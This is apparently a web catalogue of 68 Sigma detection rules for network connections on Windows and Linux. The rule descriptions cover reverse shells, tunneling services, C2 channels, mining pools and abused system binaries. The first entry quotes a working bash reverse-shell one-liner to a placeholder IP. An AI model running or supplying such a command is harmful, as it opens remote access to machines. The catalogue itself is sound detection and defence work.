Log source category
network_connection log source Sigma rules
68 Sigma detection rules in the library use the network_connection log source, mostly on windows, linux. The network_connection category groups related telemetry so you can find detections that consume the same events. Open a rule to read its detection logic, MITRE ATT&CK mapping and original YAML.
Linux Reverse Shell Indicator
criticalDetects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
linux
Certificate Services Outbound SMB or LDAP Connection
highDetects the Windows Certificate Services process (certsrv.exe) initiating an outbound network connection on port 445 (SMB) or 389 (LDAP) to a non-DC host. This behaviour is inherently suspicious: under normal operation the CA resolves subject identities via local RPC against the domain and never initiates outbound SMB or LDAP connections to arbitrary hosts. Any such connection indicates the CA is being coerced into performing a remote identity lookup against an attacker-controlled host. The most direct known trigger is the CA chase fallback (EDITF_ENABLECHASECLIENTDC) where a requester-supplied 'cdc' attribute causes the CA to open SMB and LDAP to a specified address. CVE-2026-54121 (Certighost) exploits this path to redirect the CA to rogue LSA and LDAP services that return a DC's identity, resulting in a forged DC certificate. This rule is not limited to Certighost — any future vulnerability or misconfiguration that causes certsrv.exe to make outbound SMB or LDAP connections is covered.
windows
Communication To LocaltoNet Tunneling Service Initiated
highDetects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
windows
Communication To LocaltoNet Tunneling Service Initiated - Linux
highDetects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
linux
Communication To Ngrok Tunneling Service - Linux
highDetects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
linux
Communication To Ngrok Tunneling Service Initiated
highDetects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
windows
Dfsvc.EXE Initiated Network Connection Over Uncommon Port
highDetects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications.
windows
Linux Crypto Mining Pool Connections
highDetects process connections to a Monero crypto mining pool
linux
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
highDetects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
windows
Network Communication With Crypto Mining Pool
highDetects initiated network connections to crypto mining pools. It indicates that the system is likely infected with a crypto miner malware or is being used for crypto mining.
windows
Network Connection Initiated By AddinUtil.EXE
highDetects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
windows
Network Connection Initiated By Eqnedt32.EXE
highDetects network connections from the Equation Editor process "eqnedt32.exe".
windows
Network Connection Initiated By IMEWDBLD.EXE
highDetects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
windows
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
highDetects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
windows
Network Connection Initiated via Finger.EXE
highDetects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
windows
Network Connection Initiated Via Notepad.EXE
highDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
windows
New Connection Initiated To Potential Dead Drop Resolver Domain
highDetects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
windows
New RDP Connection Initiated From Domain Controller
highDetects an RDP connection originating from a domain controller.
windows
Outbound Network Connection Initiated By Cmstp.EXE
highDetects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
windows
Outbound Network Connection Initiated By Microsoft Dialer
highDetects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
windows
Outbound Network Connection Initiated By Script Interpreter
highDetects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
windows
Outbound RDP Connections Over Non-Standard Tools
highDetects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
windows
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
highDetects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
windows
Potential Pikabot C2 Activity
highDetects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
windows
Potential Remote PowerShell Session Initiated
highDetects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.
windows
Potentially Suspicious Malware Callback Communication
highDetects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
windows
Potentially Suspicious Malware Callback Communication - Linux
highDetects programs that connect to known malware callback ports based on threat intelligence reports.
linux
Process Initiated Network Connection To Ngrok Domain
highDetects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
windows
RDP Over Reverse SSH Tunnel
highDetects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
windows
RDP to HTTP or HTTPS Target Ports
highDetects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
windows
Silenttrinity Stager Msbuild Activity
highDetects a possible remote connections to Silenttrinity c2
windows
Suspicious Dropbox API Usage
highDetects an executable that isn't dropbox but communicates with the Dropbox API
windows
Suspicious Network Connection Binary No CommandLine
highDetects suspicious network connections made by a well-known Windows binary run with no command line parameters
windows
Uncommon Network Connection Initiated By Certutil.EXE
highDetects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
windows
Communication To Uncommon Destination Ports
mediumDetects programs that connect to uncommon destination ports
windows
Dfsvc.EXE Network Connection To Non-Local IPs
mediumDetects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
windows
Dllhost.EXE Initiated Network Connection To Non-Local IP Address
mediumDetects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
windows
HH.EXE Initiated HTTP Network Connection
mediumDetects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
windows
Local Network Connection Initiated By Script Interpreter
mediumDetects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
windows
Microsoft Sync Center Suspicious Network Connections
mediumDetects suspicious connections from Microsoft Sync Center to non-private IPs.
windows
Network Communication Initiated To Portmap.IO Domain
mediumDetects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
windows
Network Connection Initiated By Regsvr32.EXE
mediumDetects a network connection initiated by "Regsvr32.exe"
windows
Network Connection Initiated From Users\Public Folder
mediumDetects a network connection initiated from a process located in the "C:\Users\Public" folder. Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environement.
windows
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
mediumDetects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
windows
Network Connection Initiated To BTunnels Domains
mediumDetects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
windows
Network Connection Initiated To Cloudflared Tunnels Domains
mediumDetects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
windows
Network Connection Initiated To DevTunnels Domain
mediumDetects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
windows
Network Connection Initiated To Visual Studio Code Tunnels Domain
mediumDetects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
windows
Office Application Initiated Network Connection Over Uncommon Ports
mediumDetects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
windows
Office Application Initiated Network Connection To Non-Local IP
mediumDetects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.
windows
Outbound Network Connection To Public IP Via Winlogon
mediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
windows
Potentially Suspicious Azure Front Door Connection
mediumDetects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
windows
Potentially Suspicious Wuauclt Network Connection
mediumDetects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
windows
Python Initiated Connection
mediumDetects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
windows
RegAsm.EXE Initiating Network Connection To Public IP
mediumDetects "RegAsm.exe" initiating a network connection to public IP adresses
windows
Remote Access Tool - AnyDesk Incoming Connection
mediumDetects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
windows
Rundll32 Internet Connection
mediumDetects a rundll32 that communicates with public IP addresses
windows
Suspicious Network Connection to IP Lookup Service APIs
mediumDetects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
windows
Suspicious Non-Browser Network Communication With Google API
mediumDetects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
windows
Suspicious Non-Browser Network Communication With Telegram API
mediumDetects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
windows
Suspicious Outbound SMTP Connections
mediumAdversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
windows
Suspicious Wordpad Outbound Connections
mediumDetects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.
windows
Uncommon Connection to Active Directory Web Services
mediumDetects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
windows
Uncommon Outbound Kerberos Connection
mediumDetects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
windows
Msiexec.EXE Initiated Network Connection Over HTTP
lowDetects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
windows
Network Connection Initiated By PowerShell Process
lowDetects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
windows
Network Connection Initiated To Mega.nz
lowDetects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
windows
Potentially Suspicious Network Connection To Notion API
lowDetects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
windows